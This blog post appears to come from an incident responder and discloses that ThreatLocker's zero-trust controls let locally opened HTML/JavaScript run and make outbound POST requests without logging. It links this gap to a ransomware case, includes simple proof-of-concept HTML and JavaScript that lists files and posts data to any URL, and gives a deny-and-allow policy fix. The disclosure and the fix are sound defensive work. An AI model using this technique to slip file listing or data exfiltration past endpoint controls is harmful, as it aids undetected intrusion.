Image of threatlocker's logo

Exposing a Critical Flaw in Threatlocker’s Zero Trust Model

A ransomware response led me to expose a critical flaw hiding in plain sight inside ThreatLocker’s Zero Trust software.

A Bit of Background

For those unfamiliar, ThreatLocker is a zero-trust security platform that allows organizations to define exactly what software and scripts can execute on their systems. By default, everything is denied unless explicitly allowed, making it a popular choice for businesses seeking tighter control over their endpoints.

The platform includes tools for application whitelisting, ringfencing, storage control, and elevation control. In theory, this should drastically reduce the risk of malware or unauthorized code running on protected machines. But as I discovered during a real-world ransomware incident, there’s a critical flaw that puts their customers at risk.

A Vulnerability Waiting To Be Exposed

When responding to a recent ransomware attack, I stumbled upon a serious oversight in ThreatLocker’s security model—one that could severely compromise its entire zero-trust framework. While ThreatLocker is designed to lock down nearly all executable actions on a system, it shockingly overlooks a major attack vector: locally executed JavaScript (or .js) files.

At first, I thought this vulnerability was limited to directories like the user’s desktop and documents folder due to default storage control policies. But as I continued testing, I realized something far worse—JavaScript execution was approved in every directory I tested, regardless of system-wide security policies.

This means that a properly crafted JavaScript file can execute without any restrictions, enabling file enumeration, outbound API calls, and external webhooks—all without interference from ThreatLocker’s software. Worst of all, even with ThreatLocker in “safe mode,” outbound HTTP requests went completely undetected and did not show up in audit logs. Given my limited JavaScript experience, I can only imagine what a more skilled attacker could achieve.

What makes this even more baffling is that other scripting languages—like Python, Batch, and PowerShell—are correctly blocked by Threatlocker by default. The fact that JavaScript is the exception, despite its versatility and potential for abuse, raises serious questions about the consistency of their threat modeling.

To be fair, it’s somewhat understandable that JavaScript may be more loosely handled due to its use by Windows system components and third-party applications. However, considering how aggressively ThreatLocker blocks other scripting languages, you’d expect JavaScript-based files to be whitelisted during “learning mode” or explicitly managed via built-in policies. That simply isn’t the case here.

Real-World Consequences

The implications of this flaw aren’t just theoretical. The ransomware attack I responded to exploited this exact weakness.

The attacker managed to spoof WhatsApp with a locally downloaded HTML file, which contained JavaScript that downloaded additional malicious scripts. This malware began encrypting files inside the user’s documents folder, and I was only alerted because Todyl’s SGN agent flagged the unusual file encryption activity.

Even more damning—ThreatLocker approved every malicious action. When reviewing its unified audit logs, there was no indication that anything suspicious had occurred. The software, which was supposed to provide a “zero trust” security layer, completely failed to recognize and block this attack method.

The Evidence

To back up everything I’ve described so far, here’s direct evidence from ThreatLocker’s Unified Audit logs. This screenshot demonstrates how a .html file executed a local .js script on a fully locked-down system without being blocked or logged—even with Storage Control, Application Control, and Ringfencing in place. If you don’t believe me, use the scripts below to try it yourself.

The threatlocker test.html file is a simple web interface that I threw together to execute a local JavaScript file to test a few functions. I am no JavaScript developer, so these are simple in nature, but none of these script executions appear in the Unified Audit logs.

Here are the scripts that I used to create this test:

threatlocker test.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>API & File System Access Example</title>
  <!-- Load the external JavaScript file -->
  <script src="script.js" defer></script>
</head>
<body>
  <h1>Time Checker</h1>
  <button onclick="checkTime()">Check Time</button>
  <p id="timeDisplay"></p>

  <hr>

  <h2>List Files in a Directory</h2>
  <!-- Button to trigger directory selection -->
  <button onclick="listFiles()">Select Directory & List Files</button>
  <div id="fileList"></div>

  <hr>

  <h2>Test Web API Call / Webhook</h2>
  <!-- Form to enter the API URL and payload -->
  <form id="apiForm">
    <label for="apiUrl">API/Webhook URL:</label>
    <input type="url" id="apiUrl" name="apiUrl" required placeholder="https://example.com/webhook">
    <br><br>
    <label for="payload">Payload (JSON):</label>
    <br>
    <textarea id="payload" name="payload" rows="4" cols="50" placeholder='{"key": "value"}'></textarea>
    <br><br>
    <button type="submit">Send POST Request</button>
  </form>
  <div id="apiResponse"></div>
</body>
</html>

script.js

// Function to display the current time
function checkTime() {
  const now = new Date();
  const currentTime = now.toLocaleTimeString();
  document.getElementById("timeDisplay").textContent = "Current time: " + currentTime;
}

// Function to list files in a user-selected directory using the File System Access API
async function listFiles() {
  if ('showDirectoryPicker' in window) {
    try {
      // Prompt the user to select a directory
      const dirHandle = await window.showDirectoryPicker();
      const fileNames = [];
      // Iterate over entries in the directory
      for await (const entry of dirHandle.values()) {
        if (entry.kind === 'file') {
          fileNames.push(entry.name);
        }
      }
      // Display the file names or a message if no files are found
      document.getElementById("fileList").innerHTML = 
        fileNames.length > 0 ? fileNames.join("<br>") : "No files found in the selected directory.";
    } catch (err) {
      console.error("Directory access cancelled or failed:", err);
      document.getElementById("fileList").textContent = "Error accessing directory or action cancelled.";
    }
  } else {
    document.getElementById("fileList").textContent = "Your browser does not support the File System Access API.";
  }
}

// Event listener for the API/Webhook test form submission
document.getElementById("apiForm").addEventListener("submit", async function(e) {
  e.preventDefault(); // Prevent form from submitting in the default way

  const apiUrl = document.getElementById("apiUrl").value;
  let payload;
  
  // Parse the payload as JSON. Use an empty object if no payload is provided.
  try {
    const payloadText = document.getElementById("payload").value.trim();
    payload = payloadText ? JSON.parse(payloadText) : {};
  } catch (error) {
    document.getElementById("apiResponse").textContent = "Invalid JSON in payload.";
    return;
  }

  try {
    // Send a POST request to the specified URL with the JSON payload
    const response = await fetch(apiUrl, {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify(payload)
    });
    
    // Attempt to parse the response as JSON; fallback to text if parsing fails.
    let responseData;
    try {
      responseData = await response.json();
      responseData = JSON.stringify(responseData, null, 2);
    } catch {
      responseData = await response.text();
    }
    
    document.getElementById("apiResponse").innerHTML = `<pre>${responseData}</pre>`;
  } catch (err) {
    console.error("Error sending request:", err);
    document.getElementById("apiResponse").textContent = "Error sending request: " + err;
  }
});

In my opinion, the most terrifying aspect of this vulnerability isn’t just that JavaScript files can run in general, but that ThreatLocker provides zero visibility or logging for what these scripts do once they execute.

During my testing, I confirmed that I could send POST requests to any webhook or API endpoint on the internet, completely unnoticed. No alerts. No logs. No evidence in ThreatLocker’s Unified Audit that the action ever occurred.

This completely defeats the purpose of a zero-trust solution, which should provide visibility, accountability, and control over all application executions, script behavior, and outbound network activity.

ThreatLocker’s Dismissive Response

I immediately contacted Threatlocker’s support team, expecting a swift response given the severity of this issue. Instead, their technicians seemed shocked by my findings but offered little to no assistance. They failed to escalate the issue internally, and as of March 30th, 2025, the vulnerability remains fully exploitable. This dismissive attitude raises serious concerns.

I was ultimately able to implement a working fix, but not through any direct guidance from their team; I will outline this fix below. Their support offered a solution that did not work in practice, and I had to resolve the issue entirely on my own through custom rules and trial-and-error. That kind of hands-off response is unacceptable when dealing with enterprise-level security software.

The Fix

In this section, I will outline the fix I found to be effective and implemented on all our client tenants.

First, I needed to determine whether Windows itself or third-party applications rely on .js files in ways that would make outright blocking problematic. Using Search Everything, I scanned a variety of workstation and server environments to get a complete picture. What I found was encouraging; while JavaScript files are in use, they’re typically limited to a small number of known directories.

Perfect. That meant we could safely block JavaScript files globally and simply whitelist the required system and third-party app directories. To achieve this, I created two separate policies in ThreatLocker’s Storage Control module:

  1. A deny policy to block all .js and .js.* file types.
  2. An allow policy to whitelist known safe paths where JavaScript files are legitimately used.

While implementing, I quickly ran into an annoying limitation with ThreatLocker’s policies: all whitelisted file paths are restricted to 980 characters total. That meant I couldn’t simply dump all known safe paths into one policy. Instead, I had to get clever with wildcards to cover as many safe use cases as possible while keeping the path list minimal. After sorting through thousands of entries, I narrowed it down to the following set:

C:\Program Files*\*\*.js  
C:\Program Files*\*\*.js.*  
C:\Users\*\AppData\*\*.js  
C:\Users\*\AppData\*\*.js.*  
C:\Users\*\.vscode\*\*.js  
C:\Users\*\.vscode\*\*.js.*  
C:\Windows\*\*.js  
C:\Windows\*\*.js.*  
C:\xampp\*\*.js  
C:\xampp\*\*.js.*

Below is a series of screenshots that show the policy details and how they’re structured. While I could not easily capture the entire column, I have included pictures of the top and bottom of each policy. They should be ordered Allow Policy and then Deny Policy (click to expand). See the image above which shows the order I have placed these.

Once these were in place, I ran the new configuration through a week of live testing across several environments, including standard Windows 10 and 11 machines, domain controllers, terminal servers, and file servers. After extensive auditing, I was satisfied that the policies didn’t introduce any new issues and rolled them out globally.

Since implementing this fix, I’ve only seen one false positive: QuickBooks Pro 2022 required a JavaScript file within a user’s Documents folder. That was easily resolved by adding a single path exception for that client.

Important: While this fix works in our environment, I strongly recommend testing it in your own setup before applying it broadly. If you encounter edge cases or make improvements, please drop them in the comments. I’ll update the guide (and my own policies) accordingly.

The Bigger Picture

ThreatLocker isn’t the only zero-trust solution on the market, but this incident casts doubt on the entire concept of zero-trust security. If a security solution claims to prevent unauthorized execution yet overlooks something as basic as locally executed JavaScript, what else is being ignored?

For security-conscious businesses, this is a wake-up call. Do not blindly trust security vendors. Conduct independent testing, review outbound network activity, and assume that every system has weaknesses—because they do.

Until ThreatLocker addresses this issue, businesses relying on it for security are at serious risk. This vulnerability is not a theoretical exploit; it has already been used in an active ransomware attack.

If ThreatLocker truly values security, they need to act now. Until then, I advise businesses to reconsider their reliance on ThreatLocker as a security solution.

Leave a Reply